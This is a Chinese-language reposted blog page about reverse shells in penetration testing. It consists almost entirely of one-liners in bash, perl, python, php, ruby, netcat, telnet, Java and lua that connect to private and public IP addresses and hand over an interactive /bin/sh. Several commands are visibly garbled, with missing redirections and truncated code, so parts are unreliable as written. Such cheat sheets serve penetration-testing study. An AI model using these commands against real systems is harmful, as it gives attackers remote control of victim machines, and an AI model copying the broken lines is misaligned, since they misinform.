當前位置:
首頁 > 最新 > 滲透過程中的埠反彈

滲透過程中的埠反彈

反彈的各種姿勢。

bash版本:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

注意這個是由解析shell的bash完成,所以某些情況下不支持


perl版本:

perl -e "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))));"

python版本:

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"


php -r "$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");"


ruby -rsocket -e"f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)"


nc -e /bin/sh 223.8.200.234 1234

mknod /tmp/backpipe p

/bin/sh 0/tmp/backpipe


mknod backpipe p && telnet 173.214.173.151 8080 0backpipe


r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/202.103.243.122/2002;cat &5 >&5; done"] as String[])

p.waitFor()


lua -e "require("socket");require("os");t=socket.tcp();t:connect("202.103.243.122","1234");os.execute("/bin/sh -i &3 2>&3");"

文章出處:Evi1cg"s blog

你可能喜歡

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 黑白之道 的精彩文章:

Microsoft Outlook中的缺陷讓黑客輕鬆盜取您的Windows密碼
網路安全掃描平台-Gryffin

TAG:黑白之道 |